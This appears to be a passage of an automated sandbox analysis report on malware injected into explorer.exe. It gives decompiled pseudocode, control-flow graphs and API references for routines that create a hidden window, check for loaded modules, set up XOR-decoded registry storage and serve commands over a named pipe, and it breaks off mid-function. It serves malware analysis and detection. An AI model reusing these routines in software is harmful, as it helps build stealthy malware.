        • Opcode Fuzzy Hash: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
        • Instruction Fuzzy Hash: BB619C75900209EFDB50CF98D885BADBBF1FF08315F24859AE815AB391C774AA80DF60
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 200 c2eda-c2f50 memset call c902d 205 c2fcd-c2fd4 200->205 206 c2f52-c2f81 CreateWindowExA 200->206 207 c2fdf-c2ff4 205->207 208 c2fd6-c2fd7 205->208 206->207 209 c2f83-c2f92 ShowWindow 206->209 208->207 211 c2f9b 209->211 212 c2fba-c2fcb 211->212 212->205 214 c2f9d-c2fa0 212->214 214->205 215 c2fa2-c2fb2 214->215 215->212
        C-Code - Quality: 96%
        			E000C2EDA(void* __eflags) {
        				CHAR* _v12;
        				struct HINSTANCE__* _v32;
        				intOrPtr _v44;
        				intOrPtr _v48;
        				void _v52;
        				char _v80;
        				char _v144;
        				intOrPtr _t25;
        				intOrPtr _t32;
        				struct HWND__* _t34;
        				intOrPtr _t36;
        				intOrPtr _t39;
        				struct HWND__* _t44;
        				intOrPtr _t47;
        				intOrPtr _t50;
        				void* _t51;
        				intOrPtr _t53;
        				intOrPtr _t56;
        				intOrPtr _t59;
        				struct HINSTANCE__* _t64;
        
        				_t25 =  *0xde684; // 0x64f8f0
        				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
        				memset( &_v52, 0, 0x30);
        				_t59 =  *0xde688; // 0xf0000
        				E000C902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
        				_v48 = 3;
        				_v52 = 0x30;
        				_v12 =  &_v144;
        				_v44 = E000C2E77;
        				_push( &_v52);
        				_t32 =  *0xde694; // 0x64fa48
        				_v32 = _t64;
        				if( *((intOrPtr*)(_t32 + 8))() == 0) {
        					L6:
        					_t34 =  *0xde718; // 0x30340
        					if(_t34 != 0) {
        						_t39 =  *0xde694; // 0x64fa48
        						 *((intOrPtr*)(_t39 + 0x28))(_t34);
        					}
        					L8:
        					_t36 =  *0xde694; // 0x64fa48
        					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
        					return 0;
        				}
        				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
        				 *0xde718 = _t44;
        				if(_t44 == 0) {
        					goto L8;
        				}
        				ShowWindow(_t44, 0);
        				_t47 =  *0xde694; // 0x64fa48
        				 *((intOrPtr*)(_t47 + 0x18))( *0xde718);
        				while(1) {
        					_t50 =  *0xde694; // 0x64fa48
        					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
        					if(_t51 == 0) {
        						goto L6;
        					}
        					if(_t51 == 0xffffffff) {
        						goto L6;
        					}
        					_t53 =  *0xde694; // 0x64fa48
        					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
        					_t56 =  *0xde694; // 0x64fa48
        					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
        				}
        				goto L6;
        			}

        APIs
        • memset.MSVCRT ref: 000C2EF9
        • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 000C2F77
        • ShowWindow.USER32(00000000,00000000), ref: 000C2F8A
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Window$CreateShowmemset
        • String ID: 0
        • API String ID: 3027179219-4108050209
        • Opcode ID: 6eaffb3ee9b8b2be26461f6bad7f1446fdbb12cf683fc5f7db915b76c7ab6cb2
        • Instruction ID: a9f914c0b4fadeb3d72a178da7fd84f66818822a173e8fe5a0fe974533a9003f
        • Opcode Fuzzy Hash: 6eaffb3ee9b8b2be26461f6bad7f1446fdbb12cf683fc5f7db915b76c7ab6cb2
        • Instruction Fuzzy Hash: ED31F5B1501218AFF750EF68DC89FAA7BBCEB18344F00406AB909DB262D634DD058B71
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 217 c4d6d-c4d8f 218 c4dee-c4e1b call cb7a8 call ca86d call ca471 217->218 219 c4d91-c4db3 call c95c7 * 2 217->219 234 c4e1d-c4e20 218->234 235 c4e25-c4e80 call ce1bc call c95e1 call c92e5 call c85d5 call cb269 218->235 219->218 229 c4db5-c4db7 219->229 229->218 230 c4db9-c4dc4 GetModuleHandleA 229->230 232 c4dcd 230->232 233 c4dc6-c4dcb GetModuleHandleA 230->233 238 c4dd5-c4dec call c85c2 * 2 232->238 233->232 233->238 236 c52b9-c52bf 234->236 252 c4ea1-c4ed9 call c861a call c4a0b 235->252 253 c4e82-c4e93 call c896f 235->253 238->218 238->234 263 c4ef8-c4f1b 252->263 264 c4edb-c4ee3 252->264 259 c4e9c-c4e9f 253->259 260 c4e95-c4e97 call ca2e3 253->260 259->252 260->259 266 c4f1d-c4f2b 263->266 267 c4f2f-c4f54 call ce2c6 263->267 264->263 265 c4ee5-c4ee9 264->265 268 c4eef-c4ef2 265->268 269 c51f3-c5220 call c95e1 call c92e5 265->269 266->267 277 c4f56-c4f6a call ce2c6 267->277 278 c4f71-c4f78 267->278 268->263 268->269 279 c5247-c52b4 call c85d5 lstrcpynW * 2 call c8fbe call c861a * 2 269->279 280 c5222-c522b call cb269 269->280 277->278 278->269 282 c4f7e-c4f87 278->282 313 c52b7 279->313 292 c522d-c5232 280->292 293 c5239-c5246 call c861a 280->293 285 c4f89-c4f8e 282->285 286 c4f96-c4fa3 282->286 285->286 289 c4f90 285->289 286->269 290 c4fa9-c4fad 286->290 289->286 294 c5082-c5088 290->294 295 c4fb3-c4fb6 290->295 292->293 293->279 294->269 297 c508e-c50ff call c49a5 call cfc1f 294->297 295->269 299 c4fbc-c500f call c49a5 call c8604 295->299 297->269 318 c5105-c5119 call c8604 297->318 299->313 317 c5015-c507d call c95e1 call c9640 call c85d5 call ca911 call c861a 299->317 313->236 317->313 318->269 324 c511f-c5171 call c109a call c902d call c60df 318->324 337 c51e5-c51ec call c861a 324->337 338 c5173-c51d1 call c9640 call c85d5 call ca911 324->338 343 c51f1-c51f2 337->343 347 c51d6-c51e2 call c861a 338->347 343->269 347->337
        C-Code - Quality: 70%
        			E000C4D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
        				char _v516;
        				char _v556;
        				char _v564;
        				char _v568;
        				char _v572;
        				char _v576;
        				intOrPtr _v580;
        				char _v588;
        				signed int _v596;
        				intOrPtr _v602;
        				intOrPtr _v604;
        				char _v608;
        				CHAR* _v612;
        				CHAR* _v616;
        				signed int _v620;
        				signed int _v624;
        				signed int _v628;
        				signed int _v632;
        				char _v636;
        				intOrPtr _t119;
        				void* _t120;
        				signed int _t122;
        				intOrPtr _t123;
        				CHAR* _t124;
        				intOrPtr _t125;
        				CHAR* _t127;
        				WCHAR* _t130;
        				intOrPtr _t133;
        				intOrPtr _t137;
        				WCHAR* _t138;
        				intOrPtr _t142;
        				WCHAR* _t143;
        				CHAR* _t144;
        				intOrPtr _t145;
        				intOrPtr _t150;
        				intOrPtr _t153;
        				WCHAR* _t154;
        				signed int _t159;
        				WCHAR* _t160;
        				intOrPtr _t163;
        				intOrPtr _t165;
        				intOrPtr _t166;
        				intOrPtr _t170;
        				signed int _t173;
        				signed int _t178;
        				intOrPtr _t182;
        				WCHAR* _t184;
        				char _t186;
        				WCHAR* _t188;
        				intOrPtr _t200;
        				intOrPtr _t211;
        				signed int _t215;
        				char _t220;
        				WCHAR* _t231;
        				intOrPtr _t235;
        				intOrPtr _t238;
        				intOrPtr _t239;
        				intOrPtr _t246;
        				signed int _t248;
        				WCHAR* _t249;
        				CHAR* _t250;
        				intOrPtr _t262;
        				void* _t271;
        				intOrPtr _t272;
        				signed int _t277;
        				void* _t278;
        				intOrPtr _t280;
        				signed int _t282;
        				void* _t298;
        				void* _t299;
        				intOrPtr _t305;
        				CHAR* _t326;
        				void* _t328;
        				WCHAR* _t329;
        				intOrPtr _t331;
        				WCHAR* _t333;
        				signed int _t335;
        				intOrPtr* _t337;
        				void* _t338;
        				void* _t339;
        				void* _t353;
        
        				_t353 = __fp0;
        				_t337 = (_t335 & 0xfffffff8) - 0x26c;
        				_t119 =  *0xde688; // 0xf0000
        				_v620 = _v620 & 0x00000000;
        				_t328 = __ecx;
        				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
        					L7:
        					_t120 = E000CB7A8(0xdb9c8,  &_v516); // executed
        					_t14 = _t120 + 1; // 0x1
        					E000CA86D( &_v556, _t14, _t351);
        					_t298 = 0x64;
        					_t122 = E000CA471( &_v556, _t298);
        					 *0xde748 = _t122;
        					if(_t122 != 0) {
        						_push(0x4e5);
        						_t299 = 0x10;
        						_t123 = E000CE1BC(0xdb9cc, _t299); // executed
        						 *0xde680 = _t123;
        						 *_t337 = 0x610;
        						_t124 = E000C95E1(0xdb9cc);
        						_push(0);
        						_push(_t124);
        						_v612 = _t124;
        						_t125 =  *0xde688; // 0xf0000
        						_t127 = E000C92E5(_t125 + 0x228);
        						_t338 = _t337 + 0xc;
        						_v616 = _t127;
        						E000C85D5( &_v612);
        						_t130 = E000CB269(_t127);
        						_t246 = 3;
        						__eflags = _t130;
        						if(_t130 != 0) {
        							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
        							 *_t328 = _t246;
        						}
        						E000C861A( &_v616, 0xfffffffe);
        						_t133 =  *0xde688; // 0xf0000
        						_t22 = _t133 + 0x114; // 0xf0114
        						E000C4A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
        						_t262 =  *0xde688; // 0xf0000
        						_t339 = _t338 + 0x14;
        						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
        						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
        							L17:
        							asm("stosd");
        							asm("stosd");
        							asm("stosd");
        							asm("stosd");
        							asm("stosd");
        							_v572 = _t328;
        							_v576 =  *((intOrPtr*)(_t262 + 0x214));
        							_t137 =  *0xde680; // 0x64fdb0
        							_t138 =  *(_t137 + 8);
        							__eflags = _t138;
        							if(_t138 != 0) {
        								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
        							}
        							_v620 = _v620 & 0x00000000;
        							E000CE2C6(_t353,  &_v576); // executed
        							_pop(_t262);
        							_t142 =  *0xde6b4; // 0x64fa98
        							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
        							__eflags = _t143;
        							if(_t143 == 0) {
        								E000CE2C6(_t353,  &_v588);
        								_t235 =  *0xde6b4; // 0x64fa98
        								_pop(_t262);
        								 *((intOrPtr*)(_t235 + 0xc))(_v632);
        							}
        							__eflags =  *0xde73c;
        							if( *0xde73c <= 0) {
        								goto L36;
        							} else {
        								_t165 =  *0xde680; // 0x64fdb0
        								__eflags =  *(_t165 + 8);
        								if( *(_t165 + 8) != 0) {
        									_t231 =  *(_t165 + 0xc);
        									__eflags = _t231;
        									if(_t231 != 0) {
        										 *_t231(_v580);
        									}
        								}
        								_t166 =  *0xde688; // 0xf0000
        								_t262 =  *((intOrPtr*)(_t166 + 0x214));
        								__eflags = _t262 - _t246;
        								if(_t262 == _t246) {
        									goto L36;
        								} else {
        									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
        									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
        										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
        										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
        											E000C49A5();
        											asm("stosd");
        											asm("stosd");
        											asm("stosd");
        											asm("stosd");
        											_t170 =  *0xde684; // 0x64f8f0
        											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
        											_t262 = _v602;
        											_t248 = 0x3c;
        											_t173 = _t262 + 0x00000002 & 0x0000ffff;
        											_v596 = _t173;
        											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
        											_t178 = _t262 + 0x0000000e & 0x0000ffff;
        											_v624 = _t178;
        											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
        											_t182 =  *0xde688; // 0xf0000
        											_t184 = E000CFC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
        											_t339 = _t339 + 0xc;
        											__eflags = _t184;
        											if(_t184 >= 0) {
        												_t333 = E000C8604(0x1000);
        												_v616 = _t333;
        												_pop(_t262);
        												__eflags = _t333;
        												if(_t333 != 0) {
        													_t186 = E000C109A(_t262, 0x148);
        													_t305 =  *0xde688; // 0xf0000
        													_v636 = _t186;
        													_push(_t305 + 0x648);
        													_push(0xa);
        													_push(7);
        													_t271 = 2;
        													E000C902D(_t271,  &_v572);
        													_t272 =  *0xde688; // 0xf0000
        													_t188 = E000C60DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
        													_t339 = _t339 + 0x18;
        													_v632 = _t188;
        													__eflags = _t188;
        													if(_t188 != 0) {
        														_push(_v624 % _t248 & 0x0000ffff);
        														_push(_v628 & 0x0000ffff);
        														_push(_v596 % _t248 & 0x0000ffff);
        														_push(_v620 & 0x0000ffff);
        														_push(_v632);
        														_push( &_v572);
        														_t200 =  *0xde688; // 0xf0000
        														__eflags = _t200 + 0x1020;
        														E000C9640(_t333, 0x1000, _v636, _t200 + 0x1020);
        														E000C85D5( &_v636);
        														E000CA911(_t333, 0, 0xbb8, 1); // executed
        														E000C861A( &_v632, 0xfffffffe);
        														_t339 = _t339 + 0x44;
        													}
        													E000C861A( &_v616, 0xfffffffe); // executed
        													_pop(_t262);
        												}
        											}
        										}
        										goto L36;
        									}
        									__eflags = _t262 - 2;
        									if(_t262 != 2) {
        										goto L36;
        									}
        									E000C49A5();
        									asm("stosd");
        									asm("stosd");
        									asm("stosd");
        									asm("stosd");
        									_t211 =  *0xde684; // 0x64f8f0
        									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
        									_t215 = _v602 + 0x00000002 & 0x0000ffff;
        									_v628 = _t215;
        									_t277 = 0x3c;
        									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
        									_t249 = E000C8604(0x1000);
        									_v624 = _t249;
        									_pop(_t278);
        									__eflags = _t249;
        									if(_t249 != 0) {
        										_t220 = E000C95E1(_t278, 0x32d);
        										_t280 =  *0xde688; // 0xf0000
        										_push(_t280 + 0x228);
        										_t282 = 0x3c;
        										_v636 = _t220;
        										_push(_v628 % _t282 & 0x0000ffff);
        										E000C9640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
        										E000C85D5( &_v636);
        										E000CA911(_t249, 0, 0xbb8, 1);
        										E000C861A( &_v624, 0xfffffffe);
        									}
        									goto L41;
        								}
        							}
        						} else {
        							_t238 =  *((intOrPtr*)(_t262 + 0x214));
        							__eflags = _t238 - _t246;
        							if(_t238 == _t246) {
        								goto L17;
        							}
        							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
        							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
        								L36:
        								_t144 = E000C95E1(_t262, 0x610);
        								_push(0);
        								_push(_t144);
        								_v616 = _t144;
        								_t145 =  *0xde688; // 0xf0000
        								_t329 = E000C92E5(_t145 + 0x228);
        								_v612 = _t329;
        								__eflags = _t329;
        								if(_t329 != 0) {
        									_t160 = E000CB269(_t329);
        									__eflags = _t160;
        									if(_t160 != 0) {
        										_t163 =  *0xde684; // 0x64f8f0
        										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
        									}
        									E000C861A( &_v612, 0xfffffffe);
        								}
        								E000C85D5( &_v616);
        								_t150 =  *0xde688; // 0xf0000
        								lstrcpynW(_t150 + 0x438,  *0xde740, 0x105);
        								_t153 =  *0xde688; // 0xf0000
        								_t154 = _t153 + 0x228;
        								__eflags = _t154;
        								lstrcpynW(_t154,  *0xde738, 0x105);
        								_t331 =  *0xde688; // 0xf0000
        								_t117 = _t331 + 0x228; // 0xf0228
        								 *((intOrPtr*)(_t331 + 0x434)) = E000C8FBE(_t117, __eflags);
        								E000C861A(0xde740, 0xfffffffe);
        								E000C861A(0xde738, 0xfffffffe);
        								L41:
        								_t159 = 0;
        								__eflags = 0;
        								L42:
        								return _t159;
        							}
        							__eflags = _t238 - 2;
        							if(_t238 != 2) {
        								goto L36;
        							}
        							goto L17;
        						}
        					}
        					L8:
        					_t159 = _t122 | 0xffffffff;
        					goto L42;
        				}
        				_t250 = E000C95C7(0x6e2);
        				_v616 = _t250;
        				_t326 = E000C95C7(0x9f5);
        				_v612 = _t326;
        				if(_t250 != 0 && _t326 != 0) {
        					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
        						_v620 = 1;
        					}
        					E000C85C2( &_v616);
        					_t122 = E000C85C2( &_v612);
        					_t351 = _v620;
        					if(_v620 != 0) {
        						goto L8;
        					}
        				}
        			}

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 000C4DC0
        • GetModuleHandleA.KERNEL32(00000000), ref: 000C4DC7
        • lstrcpynW.KERNEL32(000EFBC8,00000105), ref: 000C526F
        • lstrcpynW.KERNEL32(000EFDD8,00000105), ref: 000C5283
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: HandleModulelstrcpyn
        • String ID:
        • API String ID: 3430401031-0
        • Opcode ID: a465bcc662a9801189247cd59d089760d5b2421ab61ad7513f407ef9ed4bfe34
        • Instruction ID: c173cb8aab5dce0c54eecf333e52df57e25390bf92b520147ff03b0ab50bf869
        • Opcode Fuzzy Hash: a465bcc662a9801189247cd59d089760d5b2421ab61ad7513f407ef9ed4bfe34
        • Instruction Fuzzy Hash: 36E1CF71604341AFE750EF64CC86FAE73E9AB98314F040A2EF944DB2D2DB74D9448B62
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        control_flow_graph 350 c9b43-c9b75 call c8604 353 c9b7e-c9b9e call cb5f6 350->353 354 c9b77-c9b79 350->354 358 c9ba0 353->358 359 c9ba3-c9bb8 call c95c7 353->359 356 c9e1a-c9e1e 354->356 358->359 362 c9cee-c9cfb 359->362 363 c9bbe-c9bd6 359->363 364 c9d3c-c9d4c call c9292 362->364 365 c9cfd-c9d1e 362->365 370 c9bdc-c9bf8 363->370 371 c9ceb 363->371 374 c9d4f-c9d51 364->374 372 c9d54-c9d74 call c85c2 RegOpenKeyExA 365->372 373 c9d20-c9d3a call c9292 365->373 370->372 380 c9bfe-c9c18 call c9292 370->380 371->362 381 c9dc8-c9dcd 372->381 382 c9d76-c9d8b RegCreateKeyA 372->382 373->374 374->372 386 c9d8d-c9db2 call c861a memset call c861a 380->386 393 c9c1e-c9c36 380->393 384 c9dcf 381->384 385 c9dd5 381->385 382->386 387 c9dba-c9dbf 382->387 384->385 391 c9dd8-c9dea RegCloseKey call cc379 385->391 386->387 389 c9dc1 387->389 390 c9dc3-c9dc6 387->390 389->390 390->391 398 c9def-c9df4 391->398 400 c9c38-c9c7c call c95e1 call c92e5 call c85d5 call c9256 393->400 401 c9cab-c9cb0 393->401 402 c9e0b-c9e18 call c861a 398->402 403 c9df6-c9e09 398->403 421 c9c7e-c9c83 400->421 422 c9c8b-c9ca9 call c861a * 2 400->422 407 c9cb6-c9ce9 call c9292 call c861a 401->407 402->356 403->402 403->403 407->372 421->422 424 c9c85 421->424 422->407 424->422
        C-Code - Quality: 86%
        			E000C9B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
        				void* _v8;
        				int _v12;
        				void* _v16;
        				void* _v20;
        				int _v24;
        				void* _v28;
        				char _v32;
        				char _v36;
        				int* _v40;
        				int** _v44;
        				void _v108;
        				int* _t90;
        				void* _t91;
        				char* _t92;
        				long _t96;
        				int* _t97;
        				int* _t101;
        				long _t111;
        				int* _t112;
        				intOrPtr _t122;
        				char* _t125;
        				intOrPtr _t126;
        				intOrPtr _t128;
        				int* _t129;
        				intOrPtr _t131;
        				int* _t133;
        				intOrPtr _t134;
        				int* _t135;
        				intOrPtr _t136;
        				char* _t139;
        				int _t143;
        				int _t147;
        				intOrPtr _t148;
        				int* _t149;
        				int* _t154;
        				int** _t155;
        				int* _t161;
        				int* _t163;
        				intOrPtr _t164;
        				intOrPtr _t171;
        				int _t176;
        				char* _t177;
        				char* _t178;
        				char _t179;
        				void* _t180;
        				void* _t181;
        				void* _t183;
        
        				_t176 = 0;
        				_v24 = __edx;
        				_t177 = 0;
        				_v32 = __ecx;
        				_v28 = 0;
        				_v8 = 0x80000001;
        				_v20 = 0;
        				_t155 = E000C8604(0x110);
        				_v44 = _t155;
        				if(_t155 != 0) {
        					_t158 = _a4;
        					_t155[0x42] = _a4;
        					E000CB5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
        					_t161 = _v108;
        					__eflags = _t161 - 0x61 - 0x19;
        					_t90 = _t161;
        					if(_t161 - 0x61 <= 0x19) {
        						_t90 = _t90 - 0x20;
        						__eflags = _t90;
        					}
        					_v108 = _t90;
        					_t91 = E000C95C7(0x4d2);
        					_t163 = _v24;
        					_v16 = _t91;
        					__eflags = _t163;
        					if(_t163 == 0) {
        						L16:
        						_t164 =  *0xde688; // 0xf0000
        						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
        						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
        							_push(_t176);
        							_push( &_v108);
        							_push("\\");
        							_t92 = E000C9292(_t91);
        							_t181 = _t181 + 0x10;
        							L20:
        							_t177 = _t92;
        							_v20 = _t177;
        							goto L21;
        						}
        						_v24 = _t176;
        						_v8 = 0x80000003;
        						_t122 =  *0xde68c; // 0x64fab8
        						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
        						__eflags = _v24 - _t177;
        						if(_v24 == _t177) {
        							goto L21;
        						}
        						_push(_t176);
        						_push( &_v108);
        						_t125 = "\\";
        						_push(_t125);
        						_push(_v16);
        						_push(_t125);
        						_t92 = E000C9292(_v24);
        						_t181 = _t181 + 0x18;
        						goto L20;
        					} else {
        						_t126 =  *0xde688; // 0xf0000
        						_t128 =  *0xde68c; // 0x64fab8
        						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
        						__eflags = _t129;
        						if(_t129 != 0) {
        							_t91 = _v16;
        							goto L16;
        						}
        						_v12 = _t176;
        						_t131 =  *0xde68c; // 0x64fab8
        						_v8 = 0x80000003;
        						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
        						__eflags = _v12 - _t177;
        						if(_v12 == _t177) {
        							L21:
        							E000C85C2( &_v16);
        							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
        							__eflags = _t96;
        							if(_t96 == 0) {
        								_t97 = _a8;
        								__eflags = _t97;
        								if(_t97 != 0) {
        									 *_t97 = 1;
        								}
        								_push(_v28);
        								L30:
        								RegCloseKey();
        								_t155[0x43] = _v8;
        								_t101 = E000CC379(_t177);
        								 *_t155 = _t101;
        								__eflags = _t101;
        								if(_t101 == 0) {
        									L32:
        									E000C861A( &_v20, 0xffffffff);
        									return _t155;
        								} else {
        									goto L31;
        								}
        								do {
        									L31:
        									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
        									_t176 = _t176 + 1;
        									__eflags = _t176 -  *_t155;
        								} while (_t176 <  *_t155);
        								goto L32;
        							}
        							_v16 = _t176;
        							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
        							__eflags = _t111;
        							if(_t111 == 0) {
        								_t112 = _a8;
        								__eflags = _t112;
        								if(_t112 != 0) {
        									 *_t112 = _t176;
        								}
        								_push(_v16);
        								goto L30;
        							}
        							L23:
        							E000C861A( &_v44, 0x110);
        							memset( &_v108, _t176, 0x40);
        							E000C861A( &_v20, 0xffffffff);
        							goto L1;
        						}
        						_push(_t176);
        						_push(_v16);
        						_t178 = "\\";
        						_push(_t178);
        						_t133 = E000C9292(_v12);
        						_t181 = _t181 + 0x10;
        						_v40 = _t133;
        						__eflags = _t133;
        						if(_t133 == 0) {
        							goto L23;
        						}
        						_t134 =  *0xde68c; // 0x64fab8
        						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
        						__eflags = _t135;
        						if(_t135 == 0) {
        							_t136 =  *0xde68c; // 0x64fab8
        							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
        						} else {
        							_t143 = E000C95E1( &_v36, 0x34);
        							_v24 = _t143;
        							_t179 = E000C92E5(_v32);
        							_v32 = _t179;
        							E000C85D5( &_v24);
        							_t183 = _t181 + 0x18;
        							_t147 = E000C9256(_v12);
        							_v24 = _t147;
        							_t148 =  *0xde68c; // 0x64fab8
        							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
        							__eflags = _t149;
        							if(_t149 == 0) {
        								_t154 = _a12;
        								__eflags = _t154;
        								if(_t154 != 0) {
        									 *_t154 = 1;
        								}
        							}
        							E000C861A( &_v32, 0xfffffffe);
        							E000C861A( &_v24, 0xfffffffe);
        							_t181 = _t183 + 0x10;
        							_t178 = "\\";
        						}
        						_t139 = E000C9292(_v12);
        						_t171 =  *0xde684; // 0x64f8f0
        						_t181 = _t181 + 0x18;
        						_t177 = _t139;
        						_v20 = _t177;
        						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
        						E000C861A( &_v40, 0xffffffff);
        						goto L21;
        					}
        				}
        				L1:
        				return 0;
        			}

        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 8353e44af509d9735a0a927840699760167d5c64e14aba3f13b978e54da95b18
        • Instruction ID: d99cd1c3d9fcc3767b0c57ffbf3441cc8e1f37364192496a450fb361744b74f1
        • Opcode Fuzzy Hash: 8353e44af509d9735a0a927840699760167d5c64e14aba3f13b978e54da95b18
        • Instruction Fuzzy Hash: FB913CB1D00209AFDF10DF95CC89EEEBBB8EF18350F10416AF915AB292D7349A00CB61
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        control_flow_graph 428 c32a1-c32b4 429 c32b7-c32ce ConnectNamedPipe 428->429 430 c32d0-c32db GetLastError 429->430 431 c32e1-c3304 429->431 430->431 432 c34c2-c34c8 430->432 434 c34a8 GetLastError 431->434 435 c330a-c330e 431->435 436 c34ae-c34bc DisconnectNamedPipe 434->436 435->434 437 c3314-c3320 435->437 436->429 436->432 438 c33b8-c33d1 call c93be 437->438 439 c3326-c3329 437->439 450 c3476-c349b call c96ca 438->450 451 c33d7-c33dd 438->451 441 c332b-c332f 439->441 442 c3397-c33b3 call cc319 439->442 443 c337b-c3384 call cf79f 441->443 444 c3331-c3334 441->444 442->436 460 c3358-c335b 443->460 447 c3365-c3369 call cf79f 444->447 448 c3336-c3339 444->448 464 c336e-c3376 447->464 453 c334f-c3353 call cf7c1 448->453 454 c333b-c333e 448->454 468 c349d-c34a6 call cc319 450->468 457 c33df-c33f6 call c8604 451->457 458 c3454-c346f call c9749 call c1da0 451->458 453->460 454->436 461 c3344-c334d call cf7c1 454->461 477 c33f8-c33fd 457->477 478 c3471 457->478 458->450 469 c335d-c3363 460->469 470 c3386-c3388 460->470 461->464 464->468 468->436 474 c338a-c3392 call cc319 469->474 470->474 474->436 483 c33ff-c3402 477->483 484 c342a-c3452 call c9749 call c1da0 call c94b7 477->484 481 c3473 478->481 481->450 485 c3404-c3425 call cc379 call c91a6 483->485 484->481 496 c3427 485->496 496->484
        C-Code - Quality: 54%
        			E000C32A1() {
        				char _v8;
        				struct _OVERLAPPED* _v12;
        				struct _OVERLAPPED* _v16;
        				intOrPtr* _v20;
        				char _v24;
        				intOrPtr _v32;
        				signed int _v36;
        				intOrPtr* _v40;
        				char _v168;
        				char _v172;
        				intOrPtr _t41;
        				void* _t47;
        				char _t54;
        				char _t61;
        				intOrPtr _t64;
        				void* _t65;
        				void* _t68;
        				void* _t70;
        				void* _t72;
        				void* _t76;
        				struct _OVERLAPPED* _t82;
        				intOrPtr* _t83;
        				signed int _t84;
        				signed short* _t86;
        				intOrPtr* _t97;
        				signed short* _t105;
        				void* _t107;
        				void* _t108;
        				void* _t109;
        				intOrPtr* _t112;
        				struct _OVERLAPPED* _t113;
        				char _t114;
        				void* _t115;
        
        				_t113 = 0;
        				_t82 = 0;
        				_v8 = 0;
        				_v12 = 0;
        				while(1) {
        					_v16 = _t113;
        					if(ConnectNamedPipe( *0xde674, _t113) == 0 && GetLastError() != 0x217) {
        						break;
        					}
        					_push(_t113);
        					_push( &_v16);
        					_t41 =  *0xde684; // 0x64f8f0
        					_push(0x80000);
        					_push( *0xde724);
        					_push( *0xde674);
        					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
        						GetLastError();
        					} else {
        						_t86 =  *0xde724; // 0x2680020
        						_t47 = ( *_t86 & 0x0000ffff) - 1;
        						if(_t47 == 0) {
